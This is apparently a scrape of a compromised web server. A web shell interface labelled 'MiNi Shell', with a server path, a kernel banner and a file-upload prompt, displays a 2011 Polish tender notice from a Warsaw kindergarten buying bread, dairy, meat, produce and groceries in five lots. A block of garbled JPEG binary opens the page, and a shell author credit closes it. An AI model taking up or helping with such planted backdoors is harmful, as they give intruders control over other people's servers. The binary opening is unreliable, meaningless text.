JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/321313-N-2011.html

<p class="kh_header"><b>Warszawa: DOSTAWA
ARTYKUŁÓW SPOŻYWCZYCH 
Z PODZIAŁEM NA 5 PAKIETÓW</b><br>
<b>Numer ogłoszenia: 321313 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 3 , ul. Grzybowska 7, 00-132 Warszawa, woj. mazowieckie, tel. 22 6209158, faks 22 6209158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole3.bip.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA
ARTYKUŁÓW SPOŻYWCZYCH 
Z PODZIAŁEM NA 5 PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWĘ
ARTYKUŁÓW SPOŻYWCZYCH 
Z PODZIAŁEM NA 5 PAKIETÓW:1) Pieczywo
2) Produkty mleczarskie
3) Mięso, wędliny
4) Warzywa, owoce, mrożonki
5) Rożne produkty spożywcze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.10.00.00-9, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1, 03.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole3.bip.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-132 Warszawa
ul. Grzybowska 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2011 godzina 10:00, miejsce: Przedszkole Nr 3
00-132 Warszawa
ul. Grzybowska 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb biały 450 g	Szt.	420
Chleb razowy 450 g	Szt.	230
Bułka paryska 330 g	Szt.	530
Chałka drożdżowa 310 g	Szt.	90
Pączki z marmoladą	Szt.	150
Drożdżówki z budyniem	Szt. 	135
Ciastka kruche	Kg	25
Faworki	Kg	4
Babka drożdżowa	Kg	15
Bułka mleczna 40 g	Szt.	550.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko 3,2% opakowanie folia	L	3200	
Masło ostrołęckie delikatne 200 g	Szt.	570	
Ser biały tłusty	Kg	130	
Ser żółty tłusty	Kg	30	
Ser topiony różne smaki 0,200	Szt. 	80	
Śmietana 18% 200 ml	Szt.	490	
Serki bez konserwantów z mleka krowiego 
i z rozdrobnionych owoców, zawierające wapń i witaminę D typu Danonki, opakowanie plastikowe o pojemności 
80 g	Szt. 	1200	
Kefir 400 g	Szt. 	90	
Mleko fermentowane z L.Casei Defensis, witaminami B6 i D, opakowanie plastikowe butelka o pojemności 100 g	Szt.	400	
Śmietana kremowa, opakowanie pojemnik plastikowy 500 ml	Szt. 	20	
Serek mozarella	Kg	10	
Serek homogenizowany naturalny	Kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczak świeży waga 1,2 - 1,5 kg	Kg	360
Filet z kurczaka świeży	Kg	60
Udko z kurczaka świeże	Kg	150
Pierś z indyka świeża	Kg	30
Mięso wieprzowe od szynki świeże	Kg	80
Schab środkowy b/k świeży	Kg	50
Wołowe b/k świeże	Kg	30
Wątróbka kurza świeża	Kg	12
Cielęcina b/k świeża	Kg	10
Boczek surowy b/k świeży	Kg	3
Słonina świeża	Kg	6
Żołądki drobiowe świeże	Kg	8
Szynka gotowana świeża plastry	Kg	25
Polędwica sopocka świeża plastry	Kg	30
Parówki wieprzowe cienkie o zawartości 71% tłuszczu wieprzowego, opakowanie foliowe o pojemności 250 g	Kg	50
Kiełbasa cienka podwawelska	Kg	20
Kiełbasa żywiecka	Kg	13
Filet z indyka wędzony	Kg	4
Filet z kurczaka wędzony	Kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA, OWOCE, MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki białe, gat. I	Kg	1050			
Marchew, gat. I	Kg	330			
Pietruszka, gat. I	Kg	80			
Por	Kg	80			
Seler	Kg	80			
Cebula	Kg	80			
Kapusta biała główka	Kg	55			
Kapusta kiszona	Kg	60			
Kapusta czerwona główka	Kg	20			
Kapusta pekińska	Kg	40			
Buraki czerwone	Kg	80			
Kalafior świeży	Szt.	30			
Fasolka świeża żółta	Kg	30			
Ogórki kiszone, wiaderko plastikowe 1000 g	Kg	60			
Ogórek świeży długi	Kg	60			
Pomidory rozmiar 8	Kg	75			
Papryka czerwona świeża	Kg	28			
Sałata masłowa	Szt.	65			
Koperek świeży 100 g	pęczek	40			
Szczypiorek 50 g	pęczek	120			
Pietruszka natka 100 g	pęczek	235			
Czosnek 50 g	Szt.	80			
Rzodkiewka czerwona	pęczek	120			
Cykoria	Kg	3			
Pieczarki świeże duże	Kg	20			
Botwinka	pęczek	15			
Kapusta młoda główka	Szt.	15			
Kapusta włoska główka	Szt. 	33			
Cukinia świeża	Kg	10			
Kabaczek świeży	Szt.	10			
Rzodkiew biała	Kg	8			
Dynia	Kg	10			
Jabłka deserowe cortland, duże, gat. I	Kg 	380			
Cytryny	Kg	35			
Sałata lodowa	Szt. 	50			
Śliwki węgierki gat. I	Kg	30			
Truskawki świeże	Kg	50			
Winogrona gat. I	Kg	12			
Banany żółte	Kg	115			
Gruszki konferencje gat. I	Kg	30			
Mandarynki słodkie	Kg	65			
Pomarańcze słodkie	Kg	43			
Brzoskwinie świeże	Kg	12			
Kiwi świeże	Kg	22			
Ananas świeży	Kg	100			
Melon żółty	Szt. 	50			
Morela świeża	Kg	7			
Jagody świeże	Kg	5			
Owoc sharon, kaki gat. I	Szt.	100			
Granaty	Szt. 	50			
Brukselka świeża opakowanie 2,5 kg	Kg	10			
Kalafior mrożony, opakowanie foliowe o pojemności 2,5 kg	Kg	35			
Marchew mrożona mini, opakowanie 2,5 kg	Kg	15			
Brokuły mrożone, opakowanie foliowe 1,5 kg	Kg	30			
Włoszczyzna mrożona paski, opakowanie 2,5 kg	Kg	60			
Szpinak liściasty porcjowany mrożony, opakowanie foliowe o pojemności 2,5 kg	Kg	30			
Groszek zielony mrożony, opakowanie foliowe o  pojemności 1,5 kg	Kg	9			
Truskawki mrożone, opakowanie foliowe o pojemności 2,5 kg	Kg	80			
Mieszanka kompotowa mrożona, opakowanie folia 2,5 kg	Kg	55			
Wiśnie bez pestek mrożone, opakowanie folia 2,5 kg	Kg	60			
Porzeczka czarna mrożona, opakowanie folia 2,5 kg	Kg	45			
Fasolka mrożona cięta żółta, opakowanie foliowe o  pojemności 1,5 kg	Kg	33			
Frytki mrożone karbowane do piekarnika, opakowanie folia 2,5 kg	Kg	5			
Przyprawa do ogórków kiszonych	Szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryba mrożona dorsz	Kg	105			
Ryba wędzona makrela	Kg	15			
Tuńczyk w sosie własnym kawałki, opakowanie puszka 170 g	
Szt.	
40			
Śledzie solone	Kg	5			
Margaryna mleczna, kostka 250 g	Szt.	12			
Rafinowany olej rzepakowy z pierwszego tłoczenia 100%, opakowanie plastikowa butelka o pojemności 1 l	
L	
115			
Oliwa z oliwek 1 l	L	6			
Smalec, kostka 200 g	Kg	1			
Bułka tarta drobna, opakowanie papierowe 450 g	Kg	30			
Pasztet podlaski drobiowy bez konserwantów, zawartość surowców z kurcząt ok. 34%, puszka 155 g	
Szt.	
120			
Cukier biały sypki, drobny, opakowanie papierowe o pojemności 1000 g	
Kg	
240			
Cukier puder, opakowanie papierowe 500 g	Kg	4			
Kasza manna opakowanie papierowe 1000 g	Kg	17			
Kasza kuskus z pszenicy, opakowanie papierowe 350 g	Szt. 	30			
Kasza jęczmienna wiejska, średnia, opakowanie folia 500 g	Kg	20			
Kasza gryczana opakowanie foliowe 500 g	Kg	12			
Mąka pszenna typ 480, opakowanie papierowe o  pojemności 1000 g	Kg	120			
Mąka ziemniaczana 500 g	Kg	7			
Makaron muszelki morskie typ 32, opakowanie foliowe o pojemności 400 g	Szt.	130			
Makaron krajanka nr 8, opakowanie foliowe o  pojemności 400 g	Szt.	65			
Makaron zacierka 2 jajeczny 250 g	Szt. 	50			
Makaron gwiazdka domowa jajeczny 250 g	Szt. 	25			
Płatki owsiane, opakowanie papierowe 400 g	Szt. 	30			
Zbożowe kulki o smaku czekoladowym + witaminy + składniki mineralne, pełne ziarno, opakowanie foliowe o  pojemności 250 g	Szt. 	70			
Ryż długoziarnisty biały, opakowanie papierowe 1000 g	Kg	48			
Sol spożywcza drobna, opakowanie foliowe 1000 g	Kg	53			
Kasza jaglana, opakowanie folia 400 g	Szt. 	23			
Zbożowe kółeczka z miodem, opakowanie foliowe o  pojemności 250 g	Szt.	70			
Chrupiące płatki kukurydziane Corn Flakes z błonnikiem, opakowanie foliowe o pojemności 250 g	Szt.	70			
Szczaw konserwowy, słoik 350 g	Szt. 	18			
Groszek konserwowy 400 g	Szt.	22			
Groch łuskany, opakowanie foliowe 400 g	Szt. 	25			
Fasola biała drobna, sucha, opakowanie foliowe 400 g	Szt.	35			
Fasolka czerwona konserwowa puszka 400 g	Szt. 	12			
Ogórki przecier, opakowanie słoik 350 g	Szt.	40			
Pomidory całe bez skórki w soku własnym, opakowanie puszka 400 g	Szt.	60			
Przyprawa do ogórków, opakowanie papierowe 20 g	Szt.	8			
Brzoskwinie połówki w lekkim syropie, puszka 855 ml	Szt.	45			
Ananas konserwowy plastry, puszka 565 g	Szt.	22			
Woda niegazowana 1 l	L	50			
Woda niegazowana 5 l	Szt. 	25			
Wafle kakaowe lub przekładane kremem o smaku toffi w  czekoladzie mlecznej, 39 g	Szt.	500			
Krem do smarowania z orzechami laskowymi, zawartość 13%, 80 kcal, opakowanie szklane o pojemności 230 g	Szt. 	25			
Powidła śliwkowe 280 g	Szt.	15			
Dżem niskosłodzony truskawkowy, wsad owocowy ~ 40 g owoców/100 g produktu, opakowanie słoik 280 g	Szt. 	25			
Miód wielokwiatowy, opakowanie słoik 370 g	Szt. 	35			
Sok pomarańczowy, kartonik 200 ml	Szt.	400			
Sok malinowy gęsty, opakowanie butelka 430 ml	Szt.	35			
Sok wiśniowy gęsty, opakowanie butelka 430 ml	Szt.	25			
Lizaki owocowe okrągłe, 100 g	Szt. 	100			
Cukierki czekoladowe - galaretka w czekoladzie, mieszanka czekoladowa, opakowanie foliowe o  pojemności  1 kg	Kg	10			
Sok pomarańczowy, karton 1 l	L	10			
Sok wieloowocowy, karton 1 l	L	10			
Cukierki owocowe nadziewane	Kg	10			
Zając czekoladowy w sreberku, 100 g	Szt.	50			
Mikołaj czekoladowy w sreberku, 100 g	Szt.	50			
Batoniki czekoladowe z nadzieniem mlecznym 70 kcal, 4%, opakowanie papierowe 4 x 12,5 g - 50 g	Szt.	100			
Rodzynki sułtańskie	Kg	1			
Budyń śmietankowy z cukrem w proszku bez sztucznych barwników, opakowanie papierowe 60 g	Szt.	80			
Barszcz biały naturalny, butelka 0,48 l	Szt.	37			
Cukier waniliowy, torebka papierowa 32 g	Szt.	65			
Chrzan tarty łagodny, słoik 290 g	Szt.	20			
Herbata zwykła ekspresowa, 20 torebek w opakowaniu	Op.	53			
Herbata owoce leśne ekspresowa, opakowanie 300 g	Op.	43			
Herbata ekspresowa miętowa, 20 torebek w opakowaniu	Op.	22			
Rozpuszczalna kawa zbożowa dla dzieci powyżej 3 lat, z  błonnikiem ze zbóż i cykorii i magnezem, opakowanie 150 g	Op.	20			
Kwasek cytrynowy jednowodny, opakowanie papierowe o  pojemności 20 g	Szt.	27			
Koncentrat pomidorowy 30%, opakowanie słoik o  pojemności 200 g	Szt.	80			
Kisiel truskawkowy z cukrem w proszku bez sztucznych barwników, opakowanie papierowe 77 g	Szt.	260			
Kakao naturalne o obniżonej zawartości tłuszczu, 11% tłuszczu kakaowego, opakowanie papierowe 100 g	Szt.	25			
Majeranek otarty, opakowanie papierowe 15 g	Szt.	50			
Majonez dekoracyjny opakowanie słoik o pojemności 0,4 l	Szt.	55			
Pieprz prawdziwy mielony czarny, opakowanie papierowe 20 g	Szt.	50			
Rosół królewski drobiowo - wołowy w kostkach, opakowanie papierowe o pojemności 60 g (6 szt. x 10 g)	Op.	100			
Bulion grzybowy w kostkach, opakowanie o pojemności 50 g (6 szt. z 10 g)	Op.	32			
Sos myśliwski, opakowanie papierowe 37 g	Szt.	13			
Sos do spaghetti, opakowanie papierowe 48 g	Szt.	13			
Sos pieczeniowy ciemny opakowanie papierowe 30 g	Szt.	13			
Liść laurowy, opakowanie papierowe 6 g	Szt.	30			
Przyprawa typu Vegeta, opakowanie foliowe 125 g	Kg	9			
Ziele angielskie, opakowanie papierowe 15 g	Szt.	25			
Drożdże świeże, opakowanie papierowe 100 g	Szt.	8			
Ketchup łagodny bez konserwantów w plastikowej tubie o pojemności 480 g	Szt.	30			
Groszek ptysiowy	Kg	5			
Galaretka owocowa bez sztucznych konserwantów o smaku truskawki, wiśni, cytryny, opakowanie papierowe 75 g	Szt.	150			
Proszek do pieczenia, opakowanie papierowe 30 g	Szt.	20			
Cynamon mielony, opakowanie papierowe 15 g	Szt.	10			
Papryka mielona słodka, opakowanie papierowe 20 g	Szt.	18			
Aromat do ciast waniliowy, opakowanie szklane 100 ml	Szt.	12			
Sól ziołowa , opakowanie papierowe 35 g	Szt.	40			
Żelatyna spożywcza wieprzowa, produkt bezglutenowy, opakowanie papierowe o pojemności 5 g	Szt. 	13			
Sos sojowy, opakowanie szklane 150 ml	Szt.	6			
Przyprawa w płynie do zup i sosów, opakowanie butelka szklana o pojemności 200 g	Szt.	10			
Pierogi z kapustą i grzybami świeże	Kg	20			
Koncentrat buraczany, skoncentrowany barszcz czerwony, pasteryzowany, opakowanie szklane o  pojemności 330 ml	Szt.	5			
Ptasie mleczko, opakowanie papierowe o pojemności 500 g	Szt. 	120			
Tort waflowy przekładany kremem orzechowym w  czekoladzie, opakowanie papierowe o pojemności 250 g	Szt. 	51			
Kukurydza konserwowa żółta, opakowanie puszka 400 g	Szt.	35			
Jaja 63-73 g kl. I	Szt.	1600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com